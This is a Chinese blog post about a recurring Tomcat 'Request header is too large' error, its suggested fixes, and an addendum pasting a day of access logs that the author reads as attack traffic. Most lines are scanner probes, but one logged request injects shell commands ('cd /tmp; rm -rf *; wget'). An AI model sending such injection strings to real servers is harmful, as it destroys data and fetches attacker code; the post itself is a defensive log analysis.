Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level

云服务器很久没管过了，今天去看了下云服务器日志，不看不知道，一看吓一跳。

日志里竟然是一排的报错，再翻下此前的日志，每天都报一个错误：

    [http-nio-80-exec-10] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
    java.lang.IllegalArgumentException: Request header is too large
        at org.apache.coyote.http11.Http11InputBuffer.fill(Http11InputBuffer.java:790)
        at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:454)
        at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:269)
        at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
        at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)
        at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1723)
        at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
        at java.lang.Thread.run(Thread.java:748)

随后我去查了一下，网友的说法大致为以下3种：

百度经验（2021-12-15）

1、Tomcat 的 header 缓冲区不够

需要在server.xml（tomcat根目录下的conf目录）中增加 maxHttpHeaderSize，单位为KB

<Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000"
               maxHttpHeaderSize="8192"/>

2、Url头用的是 https

将 https 改成 http 即可（未实验）

3、Url传参时携带了特殊符号

json传输的时候包含了{}，这就是原因所在、

因为tomcat7某个版本之后，增加了一个新特性，就是严格按照RFC3986规范进行访问解析

而RFC3986规范定义了Url中，只允许包含: 英文字母（a-zA-Z） 数字（0-9） -_.~ 4个特殊字符

以及所有保留字符(RFC3986中指定了以下字符为保留字符：!*'();:@&=+$,/?#[])

解决方法其实很简单，可以通过修改 tomca t的 catalina.properties 的最后一行改为

tomcat.util.http.parser.HttpParser.requestTargetAllow=|{}

允许{}即可

测试结果

按照方法1 扩大header缓冲区后并没有作用

用的一直是 http 请求头

请求参数中并没有特殊字符

暂时结论

GET请求携带内容过长，超过了限制长度
中文未转码就进行传输，实际应用中标准方式是如果Url中有中文，则要先将中文转码后才进行请求
2022.04.24 补充：访问 Url 中包含特殊字符，排查自己项目请求相关代码、排查服务器日志，是否被攻击

解决办法

可以使用 POST 请求
传参前对参数长度进行限制
传参前对特殊字符进行转码

补充 ( 2022-04-24 )

今天又去看了下服务器，刚启动就报了类似错误。

经过一番日志翻阅，我初步判定是云服务器被攻击了（报错估计是入侵命令引发的）。

在我发文补充的时候翻阅日志又出现了新的攻击日志。

真心建议大家做好云服务器防护

日志中出现以下内容（下面仅为局部命令，来源查询全部来自海外，估计是隐藏了IP，特殊部分标红）

193.46.255.49 - - [24/Apr/2022:00:40:10 +0800] "GET / HTTP/1.1" 404 682
67.227.38.191 - - [24/Apr/2022:01:07:57 +0800] "GET / HTTP/1.1" 404 682
39.103.158.106 - - [24/Apr/2022:01:13:31 +0800] "-" 400 2003
39.103.158.106 - - [24/Apr/2022:01:13:31 +0800] "GET / HTTP/1.1" 404 682
45.83.66.245 - - [24/Apr/2022:01:20:10 +0800] "GET / HTTP/1.1" 404 682
45.83.67.120 - - [24/Apr/2022:01:20:11 +0800] "GET /favicon.ico HTTP/1.1" 404 682
101.133.225.252 - - [24/Apr/2022:01:29:00 +0800] "-" 400 2101
101.133.225.252 - - [24/Apr/2022:01:29:00 +0800] "GET / HTTP/1.1" 404 682
221.154.57.175 - - [24/Apr/2022:02:08:17 +0800] "CONNECT blog.naver.com:80 HTTP/1.1" 400 795
123.163.114.45 - - [24/Apr/2022:02:08:17 +0800] "HEAD / HTTP/1.1" 404 -
221.154.57.175 - - [24/Apr/2022:02:08:49 +0800] "CONNECT blog.naver.com:443 HTTP/1.1" 400 795
198.235.24.2 - - [24/Apr/2022:02:12:40 +0800] "-" 400 2047
167.94.145.57 - - [24/Apr/2022:02:26:40 +0800] "GET / HTTP/1.1" 404 682
167.94.145.57 - - [24/Apr/2022:02:26:40 +0800] "GET / HTTP/1.1" 404 682
178.32.215.187 - - [24/Apr/2022:02:29:15 +0800] "GET /.env HTTP/1.1" 404 682
20.24.218.150 - - [24/Apr/2022:02:48:08 +0800] "GET /.env HTTP/1.1" 404 682
20.24.218.150 - - [24/Apr/2022:02:48:08 +0800] "GET /wp-content/ HTTP/1.1" 404 682
101.133.143.142 - - [24/Apr/2022:03:00:20 +0800] "GET / HTTP/1.1" 404 682
47.103.8.114 - - [24/Apr/2022:03:05:52 +0800] "GET / HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:21 +0800] "GET / HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:21 +0800] "GET /favicon.ico HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:22 +0800] "GET //robots.txt HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:22 +0800] "GET //sitemap.xml HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:22 +0800] "GET //.well-known/security.txt HTTP/1.1" 404 682
47.102.46.26 - - [24/Apr/2022:03:38:36 +0800] "GET / HTTP/1.1" 404 682
101.133.151.212 - - [24/Apr/2022:03:43:42 +0800] "GET / HTTP/1.1" 404 682
85.202.169.124 - - [24/Apr/2022:04:09:22 +0800] "GET /config/getuser?index=0 HTTP/1.1" 404 682
193.124.7.9 - - [24/Apr/2022:04:33:44 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 682
51.222.253.11 - - [24/Apr/2022:05:55:52 +0800] "GET /robots.txt HTTP/1.1" 404 682
54.36.148.229 - - [24/Apr/2022:05:55:53 +0800] "GET / HTTP/1.1" 404 682
18.167.12.103 - - [24/Apr/2022:06:01:21 +0800] "GET / HTTP/1.1" 404 682
2.57.121.232 - - [24/Apr/2022:06:11:28 +0800] "GET / HTTP/1.1" 404 682
83.97.20.34 - - [24/Apr/2022:06:15:09 +0800] "GET / HTTP/1.0" 404 682
18.163.84.222 - - [24/Apr/2022:06:27:13 +0800] "GET / HTTP/1.1" 404 682
75.100.154.140 - - [24/Apr/2022:06:50:24 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ null" 400 1919
91.207.211.45 - - [24/Apr/2022:07:11:10 +0800] "GET / HTTP/1.1" 404 682
52.13.55.80 - - [24/Apr/2022:07:38:59 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:48 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:52 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:54 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:56 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:58 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:00 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:03 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:05 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:07 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:09 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:11 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:13 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:15 +0800] "CONNECT lvsenbao.cn:443 HTTP/1.1" 400 795
47.101.141.40 - - [24/Apr/2022:07:43:17 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:19 +0800] "CONNECT moyouyougame.com:2743 HTTP/1.1" 400 795
47.101.141.40 - - [24/Apr/2022:07:43:21 +0800] "GET / HTTP/1.1" 404 682
185.41.204.103 - - [24/Apr/2022:08:16:31 +0800] "GET / HTTP/1.1" 404 682
193.46.255.49 - - [24/Apr/2022:08:19:55 +0800] "GET / HTTP/1.1" 404 682
8.219.50.83 - - [24/Apr/2022:08:32:10 +0800] "GET / HTTP/1.1" 400 762
8.219.50.83 - - [24/Apr/2022:08:32:12 +0800] "-" 400 1915
8.219.50.83 - - [24/Apr/2022:08:32:18 +0800] "-" 400 1945
222.94.140.125 - - [24/Apr/2022:08:32:44 +0800] "-" 400 1931
47.92.132.229 - - [24/Apr/2022:08:44:47 +0800] "-" 400 2927
216.218.206.67 - - [24/Apr/2022:08:45:15 +0800] "GET / HTTP/1.1" 404 682
198.235.24.33 - - [24/Apr/2022:08:48:01 +0800] "GET / HTTP/1.1" 404 682
52.89.64.77 - - [24/Apr/2022:09:18:07 +0800] "GET / HTTP/1.1" 404 682

posted @ 2021-12-15 18:46 散人长情阅读(7855) 评论(2) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

散人长情